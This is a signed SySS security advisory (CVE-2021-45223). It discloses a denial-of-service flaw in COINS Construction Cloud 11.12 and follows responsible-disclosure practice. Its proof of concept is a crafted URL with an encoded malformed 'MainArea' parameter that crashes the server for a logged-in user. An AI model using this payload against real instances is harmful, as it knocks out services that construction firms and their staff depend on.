-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-028 Product: COINS Construction Cloud Manufacturer: Construction Industry Solutions (COINS) Affected Version(s): 11.12 Tested Version(s): 11.12 Vulnerability Type: CWE-707: Improper Neutralization Risk Level: High Solution Status: Open Manufacturer Notification: 2021-11-02 Solution Date: TBA Public Disclosure: 2022-01-13 CVE Reference: CVE-2021-45223 Author of Advisory: Jürgen Zöller, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: COINS Construction Cloud is an enterprise resource planning software specifically for the construction industry. The manufacturer describes the product as follows (see [1]): "COINS Construction Cloud is a powerful solution that enables construction companies, their subcontractors, suppliers and workforce – to work better together on site, off site, on the road and in the office." Due to insufficient input neutralization, COINS Construction Cloud is vulnerable to denial-of-service attacks via forced server crashes. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A logged-in user can force a server crash by sending an HTTP request with a malformed "MainArea" parameter. After a few seconds, the server becomes unresponsive, resulting in a complete denial of service. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Visit the following URL after logging in: https://[target instance].coinscloud.com/env/[environment name]/wou005.p?kco=24&pvCILevel=2&pvCISibling=24&TopMenu=%25WHOME&MainArea=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c&FrameBanner=N&frameID=1&program=wou005.p&updateContextHSA=ActivityWB&hs_actionRowid=?&info=cosval.activities&pvFrame=F%2C1664%2C196 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: TBA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-04-20: Vulnerability discovered 2021-11-02: Vulnerability reported to manufacturer 2022-01-13: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for COINS Construction Cloud https://www.coins-global.com/solutions/47/ [2] SySS Security Advisory SYSS-2021-028 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-028.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jürgen Zöller of SySS GmbH. E-Mail: juergen.zoeller@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Juergen_Zoeller.asc Key ID: 0xA55C06902A34886E Key Fingerprint: F279 067D A805 F18E BB71 E876 A55C 0690 2A34 886E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE8nkGfagF8Y67ceh2pVwGkCo0iG4FAmHdbMsACgkQpVwGkCo0 iG79rg//Rb3kVj5StsYEPPSqXmn8CNfPEZZ+OBOFBgOJPxl5AiZdSv0aeZle+AlP vK4CT8L7GhFtSCjM3doO9EFRRf4La3yx8US0lYuUriTfxgYIg8KS21espww4OD8y fSJfFmULEpP8R5s/oRZseLgYvaLGP3v9z1Lulz7ZrMD4HuV0OOA0lXd3QfkXhVDj E5R6Le5sO9S8XFuiH4EMNfDH/UpnyGhHMtL5A0KAJmrpHUzDFWW9F3fnFJ1tb2il TTbzZTLBeXdYCLvqDLVn3+TJfnSvs/L1bV7vEVcQcfv1MmusSKJjJWk4Nt3UwTF8 BA0FizyozRIn2Jz71eu8BU6uOlEOpM+QavRV3Qkl9oEb+goUxi3tCi4pdXC9Oc6k PbN8yv8Nzqwya0GuNOV6Ui8obUKyfX3pkRu8c7yonOcrCSItQC8JClVPcuZhbi4z gTqHLaeAooMNUtDsdDSFPcJgW798T0QJQukxejDfPvF4J07m5mqZCFLpresdQes8 sGIB/pGYuhl/6RsDvkONZXEWD+cZS35jO4sehh9h/SAnaYcrKDaKb6/8aKshiCmC LppPLexiv3c3S5QA0Qyi3Yob3Ga1brNIWAjSaGAjykLTX7kBtmUizsVG5NeIqsnJ UCHj659RRouAZB/6ft2DufG667X89YkrYz3LbfOqPcXPqYqXUNQ= =9Ytu -----END PGP SIGNATURE-----